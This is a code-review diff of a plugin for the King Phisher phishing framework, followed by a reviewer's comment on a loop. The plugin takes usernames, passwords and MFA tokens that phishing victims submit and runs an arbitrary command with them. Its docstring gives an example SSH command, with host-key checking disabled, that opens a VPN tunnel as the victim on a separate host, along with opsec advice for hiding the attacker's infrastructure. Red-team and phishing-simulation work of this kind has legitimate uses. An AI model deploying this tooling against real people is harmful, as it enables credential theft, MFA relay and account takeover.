server/the_commander.py

```diff
@@ -0,0 +1,173 @@
+    
+    Now any submitted credentials will automatically create a screen session. The name of the screen session will be the
+    username that was submitted. If no screen session exists after credentials were entered then the VPN tunnel was not 
+    successfully established.
+    
+    Remote server execute:
+    If you are concerned about opsec, you likely do not want to execute a VPN tunnel from your phishing infrastructure.
+    In this case follow step 1 from "Local KP server execution" and then add this into your server_config.yml:
+    
+    post_command:
+      command: 'ssh -i /<YOUR USER>/.ssh/key.pem -oStrictHostKeyChecking=no root@<ANOTHER HOST> screen -dmS {0} "sh /opt/scripts/vpn.sh {0} {1} {2}"'
+      
+    This will SSH into <ANOTHER HOST> using key.pem without the need to accept a new SSH key fingerprint. Then a new
+    screen session is opened under the victims username. If no screen session exists after credentials were entered then 
+    the VPN tunnel was not successfully established.
+    """
+    homepage = 'https://github.com/securestate/king-phisher-plugins'
+    options = [
+        plugin_opts.OptionString(
+            'command',
+            'Execute an arbitrary command from the KP server after receiving new credentials',
+            default=None
+        ),
+        plugin_opts.OptionString(
+            'mfa_required',
+            'Require MFA before executing a command',
+            default=True
+        ),
+        plugin_opts.OptionInteger(
+            'username_len',
+            'Maximum username length',
+            default=104
+        ),
+        plugin_opts.OptionInteger(
+            'mfa_token_len',
+            'Maximum mfa token length',
+            default=10
+        ),
+        plugin_opts.OptionInteger(
+            'password_len',
+            'Maximum password length',
+            default=127
+        ),
+    ]
+    req_min_version = '1.4.0'  # Whichever version implemented MFA
+    version = '1.0'
+
+    def initialize(self):
+        self.logger.warning('Command will execute upon receiving credentials:\n' + self.config['command'])
+        signals.db_session_inserted.connect(self.new_challenger_approaches, sender='credentials')
+        return True
+
+    def new_challenger_approaches(self, sender, targets, session):
+        for event in targets:
+            # Order by most recent datetime
+            query = session.query(db_models.Credential).order_by(desc(db_models.Credential.submitted))
+            query = query.filter_by(message_id=event.message_id)
+            raw = query.first()
+
+            username = raw.username
+            password = raw.password
+            mfa_token = raw.mfa_token
+
+            self.logger.warning('New credentials submitted. Verifying..')
+            if not username:
+                self.logger.warning('No username submitted but someone posted a web response. Aborting')
+                return
```

Comment:
Instead of returning, you probably want to `continue` to the next loop iteration.